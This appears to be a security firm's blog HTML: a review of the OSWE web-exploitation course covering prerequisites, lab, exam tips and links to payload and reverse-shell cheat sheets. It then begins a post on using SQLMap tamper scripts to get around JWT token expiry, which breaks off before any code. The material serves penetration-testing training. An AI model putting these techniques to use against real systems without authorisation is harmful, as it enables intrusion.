<div class="MsoListParagraphCxSpMiddle" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 0.0001pt 0.5in; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">It is also very important to have basic knowledge and understanding of other programming languages such as C#, JavaScript and Java.<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 0.0001pt 0.5in; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;"><br /></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><b><span lang="EN-US" style="font-family: Candara; mso-bidi-font-family: Candara; mso-fareast-font-family: Candara;"><span style="mso-list: Ignore;">3.<span style="font: 7.0pt "Times New Roman";"> </span></span></span></b><!--[endif]--><b><span lang="EN-US" style="font-family: Candara;">Prior experience with web application attacks:<o:p></o:p></span></b></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo1; text-indent: -.25in;">
<b><span lang="EN-US" style="font-family: Candara;"><br /></span></b></div>
<div class="MsoListParagraphCxSpMiddle" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 0.0001pt 0.5in; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">Prior experience with web application attacks will also be very advantageous as you will be required to have strong knowledge and understanding of common modern web attacks. Personally, I would also highly recommend reading the book titled “Web Application Hacker’s Handbook” beforehand as its content will be very helpful during the course and thereafter.<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 0.0001pt 0.5in; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;"><br /></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><b><span lang="EN-US" style="font-family: Candara; mso-bidi-font-family: Candara; mso-fareast-font-family: Candara;"><span style="mso-list: Ignore;">4.<span style="font: 7.0pt "Times New Roman";"> </span></span></span></b><!--[endif]--><b><span lang="EN-US" style="font-family: Candara;">Source code review:<o:p></o:p></span></b></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo1; text-indent: -.25in;">
<b><span lang="EN-US" style="font-family: Candara;"><br /></span></b></div>
<div class="MsoListParagraphCxSpMiddle" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 0.0001pt 0.5in; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">One of the things this course will teach you is how to do white-box testing on web applications by reviewing and understanding the code of the application. Therefore, prior experience in doing source code review on web applications will be advantageous.<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 0.0001pt 0.5in; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;"><br /></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><b><span lang="EN-US" style="font-family: Candara; mso-bidi-font-family: Candara; mso-fareast-font-family: Candara;"><span style="mso-list: Ignore;">5.<span style="font: 7.0pt "Times New Roman";"> </span></span></span></b><!--[endif]--><b><span lang="EN-US" style="font-family: Candara;">Web development experience:<o:p></o:p></span></b></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo1; text-indent: -.25in;">
<b><span lang="EN-US" style="font-family: Candara;"><br /></span></b></div>
<div class="MsoListParagraphCxSpMiddle" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 0.0001pt 0.5in; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">Having prior experience with web development and the workings of web applications will also assist with successfully completing this course.</span></div>
<div class="MsoListParagraphCxSpMiddle" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 0.0001pt 0.5in; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;"><br /></span></div>
<h2>
<b><u><span lang="EN-US" style="font-family: Candara;">Course Overview:</span></u></b></h2>
<div>
<b><u><span lang="EN-US" style="font-family: Candara;"><br /></span></u></b></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">After receiving the course materials, I began reading the book, watching videos and solving the exercises and milestones. <o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">The first few chapters of the course were relatively basic, but from Chapter 4 onwards it became far more advanced. Personally, it was at this point that it really became fun, as the course delved deeper into advanced techniques and attack types.<o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">Offensive Security recommends that you try to solve the exercises and milestones as you progress through the chapters, to ensure that you get a better grasp and understanding of the materials and also as proof that you have understood everything in that particular chapter.<o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">Below is a list of pros and cons to consider when deciding to take this course:<o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;"><br /></span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l3 level1 lfo2; text-indent: -.25in;">
<!--[if !supportLists]--><span lang="EN-US" style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-bidi-font-weight: bold; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";"> </span></span></span><!--[endif]--><b><span lang="EN-US" style="font-family: Candara;">PROS:<o:p></o:p></span></b></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l3 level1 lfo2; text-indent: -.25in;">
<b><span lang="EN-US" style="font-family: Candara;"><br /></span></b></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 56.25pt; mso-add-space: auto; mso-list: l2 level1 lfo3; text-indent: -.25in;">
<!--[if !supportLists]--><span lang="EN-US" style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";"> </span></span></span><!--[endif]--><span lang="EN-US" style="font-family: Candara;">Great for learning and advancing white box testing and source code review skills.<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 56.25pt; mso-add-space: auto; mso-list: l2 level1 lfo3; text-indent: -.25in;">
<!--[if !supportLists]--><span lang="EN-US" style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";"> </span></span></span><!--[endif]--><span lang="EN-US" style="font-family: Candara;">The course covers advanced real-world vulnerabilities such as deserialization attacks and advanced techniques.</span><span style="font-family: Candara; font-size: 11pt; text-indent: 0px;"> </span></div>
<div class="MsoListParagraphCxSpLast" style="margin-left: 56.25pt; mso-add-space: auto; mso-list: l2 level1 lfo3; text-indent: -.25in;">
<!--[if !supportLists]--><span lang="EN-US" style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";"> </span></span></span><!--[endif]--><span lang="EN-US" style="font-family: Candara;">The course covers a wide range of vulnerabilities and exploits, including medium, high and critical risk.</span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l3 level1 lfo2; text-indent: -.25in;">
<!--[if !supportLists]--><span lang="EN-US" style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-bidi-font-weight: bold; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";"> </span></span></span><!--[endif]--><b><span lang="EN-US" style="font-family: Candara;">CONS:</span></b></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l3 level1 lfo2; text-indent: -.25in;">
<b><span lang="EN-US" style="font-family: Candara;"><br /></span></b></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l3 level1 lfo2; text-indent: -.25in;">
<span lang="EN-US" style="font-size: 11pt; text-indent: -0.25in;"><span style="font-family: Candara;"><b> </b></span></span><span lang="EN-US" style="font-family: "Courier New"; font-size: 11pt; text-indent: -0.25in;">o<span style="font-family: "Times New Roman"; font-size: 7pt; font-stretch: normal; line-height: normal;"> </span></span><span lang="EN-US" style="font-family: Candara; font-size: 11pt; text-indent: -0.25in;">Although the course covers many different attack types, there are a few that are not covered in the course, for example, XXE, SSRF, CSRF and SSTI.</span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l3 level1 lfo2; text-indent: -.25in;">
<span lang="EN-US" style="font-size: 11pt; text-indent: -0.25in;"><span style="font-family: Candara;"> </span></span><span lang="EN-US" style="font-family: "Courier New"; font-size: 11pt; text-indent: -0.25in;">o<span style="font-family: "Times New Roman"; font-size: 7pt; font-stretch: normal; line-height: normal;"> </span></span><span lang="EN-US" style="font-family: Candara; font-size: 11pt; text-indent: -0.25in;">More exercise work and milestones would be advantageous to learners</span><span style="font-family: Candara; font-size: 11pt; text-indent: 0px;"> </span></div>
<div class="MsoListParagraphCxSpLast" style="margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level1 lfo4; text-indent: -.25in;">
<span style="font-family: Candara; font-size: 11pt; text-indent: 0px;"><br /></span></div>
<h2>
<b><u><span lang="EN-US" style="font-family: Candara;">The lab review:</span></u></b></h2>
<div>
<b><u><span lang="EN-US" style="font-family: Candara;"><br /></span></u></b></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">The lab consisted of 5 machines which contained the web applications as discussed in the course material. Therefore, by going through the course material comprehensively and successfully completing the course exercises and milestones, you should be able to successfully execute the necessary attacks and exploitation paths.<o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">Personally, I would recommend practicing as much as possible before moving onto the exam, as this will help increase your skills and confidence.</span><span style="font-family: Candara; font-size: 11pt;"> </span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Candara; font-size: 11pt;"><br /></span></div>
<h2>
<b><u><span lang="EN-US" style="font-family: Candara;">The exam review:</span></u></b></h2>
<div>
<b><u><span lang="EN-US" style="font-family: Candara;"><br /></span></u></b></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">The exam for the OSWE course is a 48-hour exam, which includes an additional 24 hours for writing your step-by-step report of the exam. As with all exams, I would recommend that you get enough sleep to ensure that you are well rested and able to perform at your peak.</span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">During the exam, I had not rested enough and it started to affect my performance; therefore, my recommendation is that if you start feeling tired, go and sleep for a bit and then resume, as this will help you to think more clearly.<o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">A few other suggestions from my experience are to remember to get up and take a walk every few hours, and not to forget to take screenshots as you solve the challenges in the exam.<o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">Lastly, try not to stress too much about the exam; try to think of it as a challenge that you are trying to solve, rather than an exam itself.<o:p></o:p></span></div>
<h3>
<b><u><span lang="EN-US" style="font-family: Candara;">Important material to read before undertaking this course:</span></u></b></h3>
<div>
<b><u><span lang="EN-US" style="font-family: Candara;"><br /></span></u></b></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">Below is a list of content material that I would recommend that you read and work through before you undertake the OSWE course:</span></div>
<div class="MsoNormal" style="-webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
</div>
<ul>
<li><span lang="EN-US" style="font-family: Candara; font-size: 11pt; text-indent: -0.25in;">“The Web Application Hacker’s Handbook” (</span><span lang="EN-US" style="font-size: 11pt; text-indent: -0.25in;"><a href="https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470"><span style="font-family: Candara;">https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470</span></a></span><span class="MsoHyperlink" style="font-size: 11pt; text-indent: -0.25in;"><span lang="EN-US" style="font-family: Candara;">)</span></span></li>
<li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings" style="font-family: Candara; font-size: 11pt; text-indent: -0.25in;">https://github.com/swisskyrepo/PayloadsAllTheThings</a></li>
<li><span lang="EN-US" style="font-family: Candara; font-size: 11pt; text-indent: -0.25in;">Pentest monkey will be helpful for some reverse shell cheat sheets (</span><span lang="EN-US" style="font-size: 11pt; text-indent: -0.25in;"><a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet"><span style="font-family: Candara;">http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</span></a></span><span lang="EN-US" style="font-family: Candara; font-size: 11pt; text-indent: -0.25in;">)</span></li>
<li><span lang="EN-US" style="font-family: Candara; font-size: 11pt; text-indent: -0.25in;">Deserialization attacks on .NET (</span><span lang="EN-US" style="font-size: 11pt; text-indent: -0.25in;"><a href="https://www.youtube.com/watch?v=eDfGpu3iE4Q"><span style="font-family: Candara;">https://www.youtube.com/watch?v=eDfGpu3iE4Q</span></a></span><span lang="EN-US" style="font-family: Candara; font-size: 11pt; text-indent: -0.25in;">)</span></li>
<li><span lang="EN-US" style="font-family: Candara; font-size: 11pt; text-indent: -0.25in;">Deserialization on several coding languages (</span><span lang="EN-US" style="font-size: 11pt; text-indent: -0.25in;"><a href="https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html"><span style="font-family: Candara;">https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html</span></a></span><span lang="EN-US" style="font-family: Candara; font-size: 11pt; text-indent: -0.25in;">)</span><b style="font-size: 11pt;"><u><span lang="EN-US" style="font-family: Candara;"> </span></u></b></li>
</ul>
<br />
<h2>
<b><u><span lang="EN-US" style="font-family: Candara;">Summary:</span></u></b></h2>
<style class="WebKit-mso-list-quirks-style">
<!--
@list l0:level7
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:4.0in;
text-indent:-.25in;
font-family:Symbol;}
@list l0:level8
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:4.5in;
text-indent:-.25in;
font-family:"Courier New";}
@list l0:level9
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:5.0in;
text-indent:-.25in;
font-family:Wingdings;}
@list l1
{mso-list-id:1060328114;
mso-list-type:hybrid;
mso-list-template-ids:-1081202348 67698703 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;}
@list l1:level1
{mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level2
{mso-level-number-format:alpha-lower;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level3
{mso-level-number-format:roman-lower;
mso-level-tab-stop:none;
mso-level-number-position:right;
text-indent:-9.0pt;}
@list l1:level4
{mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level5
{mso-level-number-format:alpha-lower;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level6
{mso-level-number-format:roman-lower;
mso-level-tab-stop:none;
mso-level-number-position:right;
text-indent:-9.0pt;}
@list l1:level7
{mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level8
{mso-level-number-format:alpha-lower;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level9
{mso-level-number-format:roman-lower;
mso-level-tab-stop:none;
mso-level-number-position:right;
text-indent:-9.0pt;}
@list l2
{mso-list-id:1283413612;
mso-list-type:hybrid;
mso-list-template-ids:1092375940 67698691 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
@list l2:level1
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:56.25pt;
text-indent:-.25in;
font-family:"Courier New";}
@list l2:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:92.25pt;
text-indent:-.25in;
font-family:"Courier New";}
@list l2:level3
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:128.25pt;
text-indent:-.25in;
font-family:Wingdings;}
@list l2:level4
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:164.25pt;
text-indent:-.25in;
font-family:Symbol;}
@list l2:level5
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:200.25pt;
text-indent:-.25in;
font-family:"Courier New";}
@list l2:level6
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:236.25pt;
text-indent:-.25in;
font-family:Wingdings;}
@list l2:level7
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:272.25pt;
text-indent:-.25in;
font-family:Symbol;}
@list l2:level8
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:308.25pt;
text-indent:-.25in;
font-family:"Courier New";}
@list l2:level9
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:344.25pt;
text-indent:-.25in;
font-family:Wingdings;}
@list l3
{mso-list-id:1608738124;
mso-list-type:hybrid;
mso-list-template-ids:-355859120 67698689 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
@list l3:level1
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l3:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l3:level3
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l3:level4
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l3:level5
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l3:level6
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l3:level7
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l3:level8
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l3:level9
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l4
{mso-list-id:1856191801;
mso-list-type:hybrid;
mso-list-template-ids:-1081202348 67698703 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;}
@list l4:level1
{mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level2
{mso-level-number-format:alpha-lower;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level3
{mso-level-number-format:roman-lower;
mso-level-tab-stop:none;
mso-level-number-position:right;
text-indent:-9.0pt;}
@list l4:level4
{mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level5
{mso-level-number-format:alpha-lower;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level6
{mso-level-number-format:roman-lower;
mso-level-tab-stop:none;
mso-level-number-position:right;
text-indent:-9.0pt;}
@list l4:level7
{mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level8
{mso-level-number-format:alpha-lower;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level9
{mso-level-number-format:roman-lower;
mso-level-tab-stop:none;
mso-level-number-position:right;
text-indent:-9.0pt;}
-->
</style><br />
<div class="MsoNormal" style="line-height: 15.693333625793457px;">
<span lang="EN-US" style="font-family: Candara;">OSWE is a very good course for people looking to improve their source code review skills as well as learning how to detect bugs and vulnerabilities by searching for them in the code itself. I would recommend that you book your exam not long after your lab time ends, so that the information you have learned will be fresh and ready to be used. Overall I enjoyed my OSWE experience and would therefore recommend it to others.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: 15.693333625793457px;">
<span lang="EN-US" style="font-family: Candara;">- Blog post by Motaz of Telspace Systems</span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-70702048798693710762020-05-20T11:02:00.000+02:002020-05-20T11:02:46.363+02:00Bypassing refresh tokens with SQLMap’s tamper scripts<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
</div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<div style="text-align: left;">
<span style="font-size: large;">In this blog post, I will take you through how to use the “--tamper” parameter of the SQLMap tool to work around the token-expiry limitation of a web application that uses JWT tokens.</span></div>
</div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Web applications that use JWT tokens typically make the token expire after a certain period of time. Once the token has expired, the application returns a 401 error, meaning that you no longer have the correct privileges to use that specific web application or endpoint.</span></div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;"><br /></span></div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;">During a recent assessment, I came across a web application that made use of JWT tokens for its authentication process. After token expiry, a request should always be sent to the application to reauthorise access and get a new token.</span></div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;"><br /></span></div>
